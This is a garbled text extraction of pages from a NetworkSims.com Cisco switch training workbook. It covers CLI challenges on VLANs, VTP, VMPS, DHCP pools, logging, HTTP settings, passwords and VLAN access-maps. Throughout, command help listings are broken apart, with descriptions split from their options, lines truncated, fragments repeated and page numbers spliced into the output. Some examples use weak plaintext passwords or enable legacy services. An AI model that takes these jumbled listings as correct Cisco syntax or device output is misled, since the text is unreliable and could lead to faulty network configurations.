(config-if)#duplex ?
auto Enable AUTO duplex configuration
full Force full duplex operation
half Force half-duplex operation
(config-if)# exit
(config)# cdp run
(config)# int fa0/1
(config-if)# cdp ?
NetworkSims.com
151
(config-if)# exit
(config)# cdp ?
holdtime
timer
run
(config)# cdp hold ?

Outline
This challenge involves the configuration of VLANs.
Objectives

Example
> en
# vlan database
VLAN 1 added:
Name: newjersey
(vlan)# ?
VLAN database editing buffer manipulation commands:
abort Exit mode without applying the changes
apply Apply current changes and bump revision number
exit
Apply changes, bump revision number, and exit mode
no
reset Abandon current changes and reread current database
show
Show database information
vlan
Add, delete, or modify values associated with a single VLAN
vtp
Perform VTP administrative functions.
(vlan)# vlan 2 ?
are
Maximum number of All Route Explorer hops for this VLAN
backupcrf Backup CRF mode of the VLAN
bridge
media
mtu
name
parent
ID number of the Parent VLAN of FDDI or Token Ring type VLANs
ring
said
IEEE 802.10 SAID
state
NetworkSims.com
152
ste
stp
tb-vlan1
tb-vlan2
Maximum number of Spanning Tree Explorer hops for this VLAN

ID number of the first translational VLAN for this VLAN (or zero
if none)
ID number of the second translational VLAN for this VLAN (or zero
if none)
<cr>
(vlan)#vlan 2 name ?
(vlan)# vlan 2 name brighton
VLAN 2 added:
Name: brighton
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config-if)# exit
(config-if)# exit
Note the vlan database command will be phased-out. An improved method is:
Switch(config)# vlan 1
are
Maximum number of All Route Explorer hops for this VLAN (or
backupcrf
bridge
exit
media
mtu
name
no
parent
remote-span
ring
said
IEEE 802.10 SAID
shutdown
state
ste
Maximum number of Spanning Tree Explorer hops for this VLAN (or
stp
tb-vlan1
zero if none)
tb-vlan2
zero if none)
Switch(config-vlan)# name ?
Switch(config-vlan)# name newjersey

NetworkSims.com
153
Outline
This challenge involves the configuration of switchport access parameters.
Objectives
Setup VLAN 2.
Define switchport access for VLAN 2.
Example
> en
# vlan database
VLAN 2 added:
Name: amsterdam
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport access
vlan Set VLAN when interface
?
is in access mode
vlan 2
vlan 2
are
backupcrf
bridge
exit
media
mtu
name
no
parent
remote-span
ring
NetworkSims.com
154
said
shutdown
state
ste
stp
tb-vlan1
tb-vlan2
IEEE 802.10 SAID

zero if none)
zero if none)
Switch(config-vlan)# name newjersey

Outline
This challenge involves the configuration of timeouts for the console.
Objectives
Setup a password on the console.

Define timeouts for the console.
Example
> en
# config t
(config-line)# log ?
NetworkSims.com
155

Outline
This challenge involves the configuration the clock, boot system and DHCP pool.
Objectives
Setup the clock.

Define the boot system.
Define the name of the DHCP pool.
Example
# clock ?
set Set the time and
# clock set 06:25
# config t
(config)# ip ?
Global IP configuration
access-list
accounting-list
accounting-threshold
accounting-transits
alias
default-gateway
dhcp-server
domain-list
domain-lookup
domain-name
finger
ftp
gdp
gratuitous-arps
host
host-routing
hp-host
http
icmp
igmp
local
name-server
radius
rcmd
reflexive-list
security
source-route
sticky-arp
subnet-zero
tacacs
tcp
NetworkSims.com
date
subcommands:
Named access-list
kept
Sets the maximum number of accounting entries
finger server
Router discovery mechanism
ICMP options
IGMP options
Rcmd commands
Allow the creation of sticky ARP entries
156
telnet
tftp
WORD
mop
rcp
tftp
(config)# ip dhcp ?
conflict
database
excluded-address
limited-broadcast-address
ping
pool
relay
smart-relay

Use all 1's broadcast address
(config)# ip dhcp pool ?

WORD Pool name
(config)# ip dhcp pool paris
(dhcp-config)# ?
DHCP pool configuration commands:
bootfile
Boot file name
client-identifier
Client identifier
client-name
Client name
default-router
Default routers
dns-server
DNS servers
domain-name
Domain name
exit
Exit from DHCP pool configuration mode
hardware-address
Client hardware address
host
Client IP address and mask
lease
Address lease time
netbios-name-server NetBIOS (WINS) name servers
netbios-node-type
NetBIOS node type
network
Network number and mask
next-server
Next server in boot process
no
option
Raw DHCP options

Outline
This challenge involves the configuration of the Ethernet ports.
Objectives
Setup the first three Ethernet ports.
NetworkSims.com
157
Example
# config t
(config)# int e0/1
(config-if)# int e0/2
(config-if)# int e0/3

Outline
This challenge involves the configuration of passwords, and usernames.
Objectives

Define the passwords.
Setup usernames and passwords.
Example
> en
# config t
(config)# password dates
(config)# enable password default
(config)# enable secret dates
(config)# username katie password hotel
(config)# username william password eggplant
(config)# username anne ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
nohangup
nopassword
password
privilege
Set user privilege this.level
secret
user-maxlinks
NetworkSims.com
158
(config)# username anne nopassword

Outline
This challenge involves the configuration of switchports
Objectives
Define the switchport mode.

Enable trunking.
Define spanning-tree costs.
Example
# config t
(config)# int fa0/1
(config-if)# switchport ?
access
Set access mode characteristics of the interface
block
Disable forwarding of unknown uni/multi cast addresses
broadcast
Set broadcast suppression level on this interface
encapsulation Set trunking encapsulation when interface is in trunking mode
host
Set port host
mode
Set trunking mode of the interface
multicast
Set multicast suppression level on this interface
native
Set trunking native characteristics when interface is in
trunking mode
nonegotiate
Device will not engage in negotiation protocol on this
interface
port-security Security related command
priority
Set appliance 802.1p priority
protected
Configure an interface to be a protected port
pruning
Set pruning VLAN characteristics when interface is in trunking
mode
trunk
Set trunking characteristics of the interface
unicast
Set unicast suppression level on this interface
voice
Voice appliance attributes
<cr>
(config-if)# switchport mode ?
access
Set trunking mode to ACCESS unconditionally
dot1q-tunnel Set trunking mode to DOT1Q TUNNEL unconditionally
dynamic
Set trunking mode to dynamically negotiate access or trunk mode
trunk
Set trunking mode to TRUNK unconditionally
(config-if)# switchport mode trunk
(config-if)# switchport trunk ?
allowed
Set allowed VLAN characteristics when interface is in trunking
mode
native
trunking mode
pruning
NetworkSims.com
159
mode
switchport trunk encapsulation ?
Interface uses only 802.1q trunking encapsulation when trunking
Interface uses only ISL trunking encapsulation when trunking
Device will negotiate trunking encapsulation with peer on
interface
(config-if)#switch trunk encapsulation ?
dot1q
Interface uses only 802.1q trunking encapsulation when trunking
isl
Interface uses only ISL trunking encapsulation when trunking
negotiate Device will negotiate trunking encapsulation with peer on
interface
(config-if)# switchport trunk encapsulation dot1q
(config-if)#
dot1q
isl
negotiate
(config-if)# spanning-tree ?
bpdufilter
Don't send or receive BPDUs on this interface
bpduguard
Don't accept BPDUs on this interface
cost
Change an interface's spanning tree port path cost
guard
Change an interface's spanning tree guard mode
link-type
Specify a link type for spanning tree protocol use
port-priority Change an interface's spanning tree port priority
portfast
Enable an interface to move directly to forwarding on link up
stack-port
Enable stack port
vlan
VLAN Switch Spanning Tree
(config-if)# spanning-tree cost ?
<1-200000000> port path cost
(config-if)# spanning-tree cost 3

Outline
This challenge involves the configuration the host table, hostname and default gateway.
Objectives

Create a hosts table.
Example
> en
# config t
NetworkSims.com
160
(config)# hostname montana


Outline
This challenge involves the configuration of logging.
Objectives
Enable logging.
Define Syslog server.
Define buffer size.
Define logging level.
Example
> enable
# config t
(config)# lo ?
Hostname or A.B.C.D
buffered
cns-events
console
exception
facility
file
history
monitor
on
rate-limit
source-interface

Set console logging level
Set logging file parameters
Set terminal line (monitor) logging level
transactions
trap
(config)# logging buffer ?
<0-7>
Logging severity level
<4096-2147483647> Logging buffer size
alerts
Immediate action needed
critical
Critical conditions
debugging
Debugging messages
emergencies
System is unusable
errors
Error conditions
informational
Informational messages
notifications
Normal but significant conditions
warnings
Warning conditions
<cr>
NetworkSims.com
(severity=1)
(severity=2)
(severity=7)
(severity=0)
(severity=3)
(severity=6)
(severity=5)
(severity=4)
161

Switch(config)# logging trap ?
<0-7>
alerts
critical
Critical conditions
debugging
Debugging messages
emergencies
System is unusable
errors
Error conditions
informational Informational messages
notifications Normal but significant conditions
warnings
Warning conditions
<cr>
(severity=1)
(severity=2)
(severity=7)
(severity=0)
(severity=3)
(severity=6)
(severity=5)
(severity=4)

Outline
This challenge involves the configuration of the HTTP server and in creating banners.
Objectives
Enable HTTP.
Define the HTTP server port.
Define the helper path.
Define an access-class number.
Create banners.
Example
> en
# config t
<0-65535> HTTP port
(config)# ip http ?
access-class
help-path
HTTP help root URL
path
port
HTTP port
server
Enable HTTP server
(config)# ip http authentication ?
enable Use enable passwords
local
Use local username and passwords
tacacs Use tacacs to authorize user
NetworkSims.com
162
(config)# ip http authentication local

(config)# ip http help-path ?
WORD root URL for help pages
(config)# ip http help-path file:///c:\wireless\help
(config)# ip http access-class 10
(config)# banner motd gorgie home
(config)# banner login welcome
(config)# banner exec admin device

Outline
This challenge involves the configuration of the clock and boot settings.
Objectives
Define the clock setting.

Define the boot method.
Example
# clock ?
# clock set 06:25
(config)# boot ?
boothlpr
Boot Helper System Image
buffersize
Specify the buffer size for filesystem-simulated NVRAM
config-file
Configuration File
enable-break
Enable Break while booting
helper
Helper Image(s)
helper-config-file
Helper Configuration File
manual
Manual Boot
private-config-file Private Configuration File
system
System Image
WORD
mop
rcp
tftp

Outline
This challenge involves the configuration of the DHCP server.
NetworkSims.com
163
Objectives
Setup a DHCP pool.

Define the network addresses.
Define the DNS-server.
Define the NetBIOS server.
Setup the lease time.
Define the default-router.
Define excluded addresses.
Define ping time-out.
Example
> en
# config t
(config)#ip dhcp pool ?
WORD Pool name
(config)# ip dhcp pool wyoming
(config-dhcp)# network 249.189.108.0 ?
/nn or A.B.C.D Network mask or prefix length
<cr>
(config-dhcp)# dns-server ?
Hostname or A.B.C.D Server's name or IP address
(config-dhcp)# exit
(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay
(config)# ip dhcp e ?
A.B.C.D Low IP address
(config)# ip dhcp excluded-address 249.189.108.26
WORD
Pool name
(config)# ip dhcp ping timeout ?
<100-10000> Ping timeout in milliseconds

NetworkSims.com
164
Outline
This challenge involves the configuration of services on the device.
Objectives
Setup services.
Define timestamp formats.
Disable small TCP servers.
Disable small UDP servers.
Example
> en
# config t
(config)# service ?
compress-config
config
dhcp
disable-ip-fast-frag
exec-callback
exec-wait
finger
hide-telnet-addresses
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
Compress the configuration file

TFTP load config files
Enable DHCP server and relay agent
Disable IP particle-based fast fragmentation
Enable exec callback
Delay EXEC startup on noisy lines
Allow responses to finger requests
Hide destination addresses in telnet command
enable line number banner for each exec
Enable Nagle's congestion control algorithm
Allow old scripts to operate with slip/ppp
Enable PAD commands
Encrypt system passwords
Enable mode specific prompt
Log significant VTY-Async events
Stamp logger messages with a sequence number
Enable log capability of slave IPs
Generate keepalives on idle incoming network
connections
tcp-keepalives-out
Generate keepalives on idle outgoing network
connections
tcp-small-servers
Enable small TCP servers (e.g., ECHO)
telnet-zeroidle
Set TCP window 0 when connection is idle
timestamps
Timestamp debug/log messages
udp-small-servers
Enable small UDP servers (e.g., ECHO)
(config)# service timestamps ?
debug Timestamp debug messages
log
Timestamp log messages
<cr>
(config)# service timestamps log ?
datetime Timestamp with date and time
uptime
Timestamp with system uptime
<cr>
(config)# service timestamps log datetime
(config)# service ?
compress-config
config
NetworkSims.com
165
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in

Enable PAD commands
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption

Outline
This challenge involves the configuration of a range of ports.
Objectives
Setup a range of ports.
Example
> en
# vlan database
(vlan)# vlan 1 name indiana
VLAN 1 added:
Name: indiana
(vlan)# vlan 2 name california
VLAN 2 added:
NetworkSims.com
166
Name: california
(vlan)# vlan 10 name finland
VLAN 10 added:
Name: finland
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int ?
Async
Async interface
BVI
Dialer
Dialer interface
FastEthernet
GigabitEthernet
GigabitEthernet IEEE 802.3z
Group-Async
Lex
Lex interface
Loopback
Loopback interface
Multilink
Null
Null interface
Port-channel
Ethernet Channel of interfaces
Transparent
Transparent interface
Tunnel
Tunnel interface
Virtual-Template
Vlan
Catalyst Vlans
fcpa
Fiber Channel
range
interface range command
(config)# int range fa0/3 - 4
(config-if-range)# switchport access ?
(config-if-range)# switchport access vlan ?
<1-1005> VLAN ID of the VLAN when this port is in access mode
dynamic
When in access mode, this interfaces VLAN is controlled by VMPS
(config-if-range)# switchport access vlan 2
(config-if-range)# exit
(config-if-range)# switchport access vlan 10
(config-if-range)# exit
(config-if-range)# shutdown

Outline
This challenge involves the setting of logging and HTTP settings.
Objectives
NetworkSims.com
167

Setup logging.
Define the clock.
Define HTTP settings.
Restrict HTTP access to a single host.
Example
> enable
# config t
(config)# username ?
WORD User name
(config)# username bill ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
nohangup
nopassword
password
privilege
secret
user-maxlinks
<cr>
(config)# username bill password ?
0
7
(config)# username bill password smith
(config)# logging ?
Hostname or A.B.C.D IP address of the logging host
buffered
cns-events
console
exception
facility
file
Set logging file parameters
history
monitor
on
rate-limit
source-interface
transactions
trap
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
NetworkSims.com
168
informational
(severity=6)
notifications
Normal but significant conditions (severity=5)
warnings
Warning conditions
(severity=4)
<cr>
(config)# logging trap ?
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
(severity=6)
notifications Normal but significant conditions (severity=5)
warnings
Warning conditions
(severity=4)
<cr>
(config)# ip http ?
access-class
path
port
HTTP port
server
Enable HTTP server
local
(config)# exit
# sh running
Cisco Switch Test 1 (Challenge 21)

Unit 1: Switch Basics
The most up-to-date version of this test is at:
http://networksims.com/sw01.html

Area: Switches VLANs
Outline
NetworkSims.com
169
This challenge involves defining VLANs.

Objectives
Define and create VLANs.

Assign ports of VLANs.

> enable
# config t
(config)# int vlan1
(config-if)# exit
(config)# int vlan2
(config-if)# exit
(config)# int vlan3
(config-if)# exit
(config)# int vlan10
(config-if)# exit
(config-if)# exit
(config-if)# exit
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
Alt:
# vlan database
% Warning: It is recommended to configure VLAN from config mode,
as VLAN database mode is being deprecated. Please consult user
documentation for configuring VTP/VLAN in config mode.
(vlan)# vlan 1 name fred
Example
> enable
# config t
(config)# int vlan1
NetworkSims.com
170
(config-if)# ip address 1.2.3.4

(config-if)# exit
(config)# int vlan2
(config-if)# exit
(config)# int vlan3
(config-if)# exit
(config-if)# exit
(config-if)# exit
(config-if)# exit
255.255.255.0
255.255.255.0
255.255.255.0
255.255.255.0
255.255.255.0
255.255.255.0
(config)# int fa0/1

access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
protected
pruning
mode
trunk
unicast
voice
<cr>
(config-if)# switchport access vlan ?
dynamic
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# exit
# show vlan
NetworkSims.com
171
VLAN Name
Status
Ports
---- -------------------------------- --------- ------------------------------1
default
active
Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24
2
VLAN0002
active
Fa0/1
1002 fddi-default
act/unsup
1003 token-ring-default
act/unsup
1004 fddinet-default
act/unsup
1005 trnet-default
act/unsup
VLAN
---1
2
1002
1003
1004
1005
Type
----enet
enet
fddi
tr
fdnet
trnet
SAID
---------100001
100002
101002
101003
101004
101005
MTU
----1500
1500
1500
1500
1500
1500
Parent
------
RingNo
------
BridgeNo
--------
Stp
---ieee
ibm
BrdgMode
--------
Trans1
-----0
0
0
0
0
0
Trans2
-----0
0
0
0
0
0
Remote SPAN VLANs

-----------------------------------------------------------------------------Primary Secondary Type
Ports
------- --------- ----------------- ------------------------------------------
Alt:
# vlan database

Area: Switches VLANs
Outline
This challenge involves defining VLANs.
Objectives
Define and create VLANs.

Assign ports of VLANs.
NetworkSims.com
172
Define the name of a VLAN.

> enable
# config t
(config)# int vlan1
(config-if)# exit
(config)# vlan 1
(config-vlan)# mtu 1000
(config-vlan)# name fred
(config-vlan)# exit
(config)# exit
Alt (to create VLAN and define details):

# vlan database
(vlan)# vlan 1 mtu 1000
Example
> enable
# config t
(config)# int vlan1
(config-if)# exit
(config)# vlan 1
(config-vlan)# ?
are
backupcrf
bridge
exit
media
mtu
name
no
parent
remote-span
ring
said
IEEE 802.10 SAID
shutdown
state
ste
stp
tb-vlan1
zero if none)
tb-vlan2
zero if none)
(config-vlan)# mtu ?
<576-18190> Value of VLAN Maximum Tranmission Unit
NetworkSims.com
173

(config-vlan)# name fred
(config-vlan)# exit
(config)# exit
The alternative method, which is deprecated is:

# vlan database
(vlan)# vlan ?
<1-1005> ISL VLAN index
(vlan)# vlan
are
backupcrf
bridge
media
mtu
name
parent
ring
said
state
ste
stp
tb-vlan1
tb-vlan2
1 ?
IEEE 802.10 SAID
if none)
if none)
(vlan)# vlan 1 mtu ?

<576-18190> Value of VLAN Maximum Tranmission Unit
(vlan)# vlan 1 mt 1000
(vlan)# vlan 1 name ?
(vlan)# vl 1 name fred

Area: Switches Extended VLANs
Outline
This challenge involves defining an extended VLANs (from 1006 to 4096). Extended VLANs
are not saved to the VLAN database, Instead they are saved to the configuration file, and
can thus be seen in the startup and running configuration (this makes them easier to copy
onto other devices).
NetworkSims.com
174
Objectives
Create an extended VLAN (from 1006 to 4096).

Define extended VLAN details.

> enable
# config t
(config)# vtp mode transparent
(config)# vlan 1006
(config-vlan)# end
Example
> enable
# config t
(config)# vtp ?
domain
Set the name of the VTP administrative domain.
file
Configure IFS filesystem file where VTP configuration is stored.
interface Configure interface as the preferred source for the VTP IP updater
address.
mode
Configure VTP device mode
password
Set the password for the VTP administrative domain
pruning
Set the adminstrative domain to permit pruning
version
Set the adminstrative domain to VTP version
(config)# vtp mode ?
client
Set the device to client mode.
server
Set the device to server mode.
transparent Set the device to transparent mode.
(config)# vlan 1006
(config-vlan)# end
# sh running
!
version 12.1
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch
!
!
ip subnet-zero
!
vtp mode transparent
!
!
NetworkSims.com
175
vlan 1006
name test
mtu 1500
!
!
Note: If the transparent mode was not set, the following would appear:
(config)# vlan 1006
(config-vlan)# exit
% Failed to create VLANs 1006
VLAN(s) not available in Port Manager.
Failed to commit extended VLAN(s) changes.
And the VLAN would not be created.

Note: Standard VLANs are stored in the VLAN database and do not appear in the running
config.

Outline
This challenge involves the configuration of VMPS.
Objectives
Setup VMPS.
Example
# config t
(config)# vmps ?
reconfirm Set VMPS reconfirm interval
retry
Set VMPS retry count
server
Configure server IP address
(config)# vmps server ?
Hostname or A.B.C.D IP address
(config)# vmps server 199.156.165.8 ?
primary Specify primary server
<cr>
(config)# vmps server 199.156.165.8 primary
(config)# vmps server 208.89.97.3
(config)# vm reconfirm ?
<0-120> Number of minutes between reconfirmations
(config)# vm retry ?
<1-10> Retry count per server
(config)# vmps reconfirm 50
(config)# vmps retry 5
NetworkSims.com
176
(config)# int fa0/1

(config-if)# switchport mode access
dynamic
(config-if)# switchport access vlan dynamic
(config)# int fa0/3
(config)# int fa0/4
(config-if)# exit
(config)# exit
# show vmps

Area: Switches VMPS
Outline
It is possible to configure VLANs using a VMPS server. The switch can be a VMPS client,
which points to a VMPS server.
Objectives
Define VMPS servers.

Define VMPS details.
Define dynamic membership for a port to a VLAN, through the VMPS server.

> enable
# config t
(config)# vmps rec 10
(config)# vmps ret 8
(config)# int fa0/1
Example
> enable
# config t
(config)# vmps ?
NetworkSims.com
177
reconfirm
retry
server
Set VMPS reconfirm interval

Set VMPS retry count
Configure server IP address
(config)# vmps server ?

Hostname or A.B.C.D IP address
(config)# vmps server 1.2.3.4 ?
primary Specify primary server
<cr>
(config)# vmps reconfirm ?
<0-120> Number of minutes between reconfirmations
(config)# vmps reconfirm 10
(config)# vm retry ?
<1-10> Retry count per server
(config)# vm retry 8
(config)# int fa0/1
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
protected
pruning
mode
trunk
unicast
voice
<cr>
(config-if)# switchport a ?
(config-if)# switchport a v ?
dynamic
<cr>
# sh vmps
VQP Client Status:
-------------------VMPS VQP Version:
1
NetworkSims.com
178
Reconfirm Interval: 10 min

Server Retry Count: 8
VMPS domain server: 1.2.3.4
1.2.3.5 (primary, current)
Reconfirmation status
--------------------VMPS Action:
No Dynamic Port
In this example the FA0/1 VLAN will be configured for its VLAN membership from the
VMPS server.

Outline
This challenge involves the configuration of an access-map
Objectives
Define an access list to permit a range of addresses.

Define an access-map.
Apply the access-map.
# config t
(config)# vlan 1
(config-vlan)# name utah
(config-vlan)# exit
(config)# vlan access-map utah
(config-access-map)# action forward
(config-access-map)# match ip access 10
(config-access-map)# exit
(config)# vlan filter utah vlan-list 1
Example
# config t
# config t
(config)# vlan 1
(config-vlan)# name utah
(config-vlan)# exit
any
Any source host
host
(config)# vlan access-map ?
WORD Vlan access map tag
(config)# vlan access-map utah
(config-access-map)# ?
action
Take the action
NetworkSims.com
179

exit
Exit from vlan access-map configuration mode
match
Match values.
no
(config-access-map)# action ?
drop
Drop packets
forward Forward packets
(config-access-map)# action forward
(config-access-map)# match ?
ip
IP based match
mac MAC based match
(config-access-map)# match ip ?
address Match IP address to access control.
(config-access-map)# match ip access ?
<1-199>
WORD
Access-list name
<cr>
(config-access-map)# match ip access 10
(config-access-map)# exit
(config)# vlan ?
WORD
ISL VLAN IDs 1-4094
access-map Create vlan access-map or enter vlan access-map command mode
dot1q
dot1q parameters
filter
Apply a VLAN Map
internal
internal VLAN
(config)# vlan filter ?
WORD VLAN map name
(config)# vl filter utah ?
vlan-list VLANs to apply filter to
(config)#vl filter utah vlan-list ?
<1-4094> VLAN id
all
Remove this filter from all VLANs
(config)# vlan filter utah vlan-list 1
NetworkSims.com
180
5
Outline
This challenge involves the configuration VLAN filtering to drop TCP packets.
Objectives
Define an extended named ACL.

Define the packets to be dropped by the VLAN.
Example
Switch(config)# ip access-list extended test
Switch(config-ext-nacl)# ?
Ext Access List configuration commands:
default
deny
dynamic
Specify a DYNAMIC list of PERMITs or DENYs
evaluate Evaluate an access list
exit
Exit from access-list configuration mode
no
permit
remark
Switch(config-ext-nacl)# permit any any
Switch(config-ext-nacl)# exit
Switch(config)# vlan access-map London 10
Switch(config-access-map)# ?
Vlan access-map configuration commands:
action
Take the action
exit
match
Match values.
no
Switch(config-access-map)# match ?
ip
IP based match
mac MAC based match
Switch(config-access-map)# match ip ?
Switch(config-access-map)# match ip address ?
NetworkSims.com
181
<1-199>
WORD
Access-list name
<cr>
Switch(config-access-map)# match ip address test
Switch(config-access-map)# action ?
drop
Drop packets
Switch(config-access-map)# action drop
Switch(config-access-map)# exit
Switch(config)# vl ?
WORD
ISL VLAN IDs 1-4094
dot1q
dot1q parameters
filter
Apply a VLAN Map
internal
internal VLAN
Switch(config)# vlan filter ?
WORD VLAN map name
Switch(config)# vl f test ?
Switch(config)# vlan filter test vlan-list 10

Outline
This challenge involves the configuration VLAN filtering to forward TCP packets.
Objectives
Define an extended named ACL.

Define the packets to be forwarded by the VLAN.
Example
Switch(config)# ip access-list extended test
Switch(config-ext-nacl)# ?
Ext Access List configuration commands:
default
deny
dynamic
Specify a DYNAMIC list of PERMITs or DENYs
evaluate Evaluate an access list
exit
Exit from access-list configuration mode
no
permit
remark
Switch(config-ext-nacl)# permit any any
Switch(config-ext-nacl)# exit
NetworkSims.com
182
Switch(config)# vlan access-map London 10

Switch(config-access-map)# ?
Vlan access-map configuration commands:
action
Take the action
exit
match
Match values.
no
Switch(config-access-map)# match ?
ip
IP based match
mac MAC based match
Switch(config-access-map)# match ip ?
Switch(config-access-map)# match ip address ?
<1-199>
WORD
Access-list name
<cr>
Switch(config-access-map)# match ip address test
Switch(config-access-map)# action ?
drop
Drop packets
Switch(config-access-map)# action forward
Switch(config-access-map)# exit
Switch(config)# vl ?
WORD
ISL VLAN IDs 1-4094
dot1q
dot1q parameters
filter
Apply a VLAN Map
internal
internal VLAN
Switch(config)# vlan filter ?
WORD VLAN map name
Switch(config)# vl f test ?
Switch(config)# vlan filter test vlan-list 10

Outline
This challenge involves the configuration of VTP.
Objectives
Define VTP details.

Enable VTP pruning.
NetworkSims.com
183
Example
# config t
(config)# vtp ?
domain
file
address.
mode
password
pruning
version
(config)# vtp domain ?
WORD The ascii name for the VTP administrative domain.
(config)# vtp domain samoa
Changing VTP domain name from NULL to samoa
(config)# vtp password ?
WORD The ascii password for the VTP administrative domain.
(config)# vtp password orange
Setting device VLAN database password to orange
(config)# vtp mode server
Setting device to VTP SERVER mode.
(config)# vtp pruning ?
<cr>
(config)# vtp pruning
Pruning switched ON
(config)# vtp version ?
<1-2> Set the adminstrative domain VTP version number
(config)# vtp version 2
Otherwise the VLAN configuration mode can be used, such as:

# vlan database
(vlan)# vtp ?
client
domain
password
Set the password for the VTP administrative domain.
pruning
Set the administrative domain to permit pruning.
server
v2-mode
Set the administrative domain to V2 mode.
(vlan)# vtp domain ?
(vlan)# vtp domain samoa
Changing VTP domain name from NULL to samoa
(vlan)# vtp password ?
WORD The ascii password for the VTP administrative
domain.
(vlan)# vtp password orange
Setting device VLAN database password to orange
(vlan)# vtp server
Setting device to VTP SERVER mode.
(vlan)# vtp pruning
Pruning switched ON

NetworkSims.com
184
Area: Switches VTP Server

Outline
VTP (VLAN Trunking Protocol) maintains the consistancy of VLANs across a domain. This
includes the addition, deletion and renaming of VLANs across the complete network. One
or more changes are automatically updated across the entire network, and thus minimizing
configuration errors. There is no way to send VLAN information to other switches, unless
VTP is enabled. Only standard-range VLANs are supported (1-1005). Also a trunk route
must be enabled for advertisements to be sent.
Domain. If it is enabled the domain name is set, and the switch will listen to broadcasts for
this domain name, otherwise it will ignore them.
Mode. If VTP is disabled the mode is set to transparent. Any changes in VLANs will not be
transmitted to other switches. With a server mode, the switch will transmit all changes in
VLANs where as the client mode acts the same but it is not possible to create, change or
delete VLANs.
Objectives
Define VTP server mode.

Define VTP details.
Enable a trunk route.

# config t
(config)# vtp
(config)# vtp
(config)# vtp
(config)# vtp
(config)# vtp
mode server
domain test
password testing
version 2
pruning
# sh vtp status
Example
> enable
# config t
(config)# vtp ?
domain
file
address.
NetworkSims.com
185
mode
password
pruning
version

(config)# vt m
client
server
transparent
(config)# vt m
?
Set the device to transparent mode.
server

(config)# vtp domain test
(config)# vtp password testing
(config)# exit
Switch#sh vtp ?
counters VTP statistics
password VTP password
status
VTP domain status
# sh vtp status
VTP Version
: 2
Configuration Revision
: 25
Maximum VLANs supported locally : 1005
Number of existing VLANs
: 69
VTP Operating Mode
: Server
VTP Domain Name
: test
VTP Pruning Mode
: Disabled
VTP V2 Mode
: Disabled
VTP Traps Generation
: Disabled
MD5 digest
: 0x59 0xBA 0x92 0xA4 0x74 0xD5 0x42 0x29
Configuration last modified by 0.0.0.0 at 3-1-93 00:18:42
Local updater ID is 10.1.1.59 on interface Vl1 (lowest numbered VLAN interface
found)
# sh vtp counters
VTP statistics:
Summary advertisements received
Subset advertisements received
Request advertisements received
Summary advertisements transmitted
Subset advertisements transmitted
Request advertisements transmitted
Number of config revision errors
Number of config digest errors
Number of V1 summary errors
:
:
:
:
:
:
:
:
:
20
0
0
11
0
0
0
0
0
VTP pruning statistics:

Trunk
Join Transmitted Join Received
Summary advts received from

non-pruning-capable device
---------------- ---------------- ---------------- ---------------------------
NetworkSims.com
186
Note
With VTP, a trunk port must be defined so that advertisements can be sent.
The default details are:
VTP name = Null
VTP mode = Server
VTP version = 2
VTP password = None
VTP pruning = Disabled

Area: Switches VTP Client
Outline
VTP (VLAN Trunking Protocol) maintains the consistancy of VLANs across a domain. This
includes the addition, deletion and renaming of VLANs across the complete network. One
or more changes are automatically updated across the entire network, and thus minimizing
configuration errors. There is no way to send VLAN information to other switches, unless
VTP is enabled. Only standard-range VLANs are supported (1-1005). Also a trunk route
must be enabled for advertisements to be sent.
Domain. If it is enabled the domain name is set, and the switch will listen to broadcasts for
this domain name, otherwise it will ignore them.
delete VLANs.
Objectives
Define VTP client mode.

Define VTP details.
Enable a trunk route.

# config t
(config)# vtp mode client
NetworkSims.com
187
(config)#
(config)#
(config)#
(config)#
vtp
vtp
vtp
vtp
domain test
password testing
version 2
pruning
# sh vtp status
Example
> enable
# config t
(config)# vtp ?
domain
file
address.
mode
password
pruning
version
(config)# vt m
client
server
transparent
(config)# vt m
?
client

(config)# vtp password testing
(config)# exit
# sh vtp ?
counters
password
status
VTP statistics
VTP password
VTP domain status
# sh vtp status
VTP Version
: 2
Configuration Revision
: 25
Maximum VLANs supported locally : 1005
Number of existing VLANs
: 69
VTP Operating Mode
: Client
VTP Domain Name
: test
VTP Pruning Mode
: Disabled
VTP V2 Mode
: Disabled
VTP Traps Generation
: Disabled
MD5 digest
: 0x59 0xBA 0x92 0xA4 0x74 0xD5 0x42 0x29
Configuration last modified by 0.0.0.0 at 3-1-93 00:18:42
Local updater ID is 10.1.1.59 on interface Vl1 (lowest numbered VLAN interface
found)
# sh vtp counters
NetworkSims.com
188
VTP statistics:
Summary advertisements received
Subset advertisements received
Request advertisements received
Summary advertisements transmitted
Subset advertisements transmitted
Request advertisements transmitted
Number of config revision errors
Number of config digest errors
Number of V1 summary errors
:
:
:
:
:
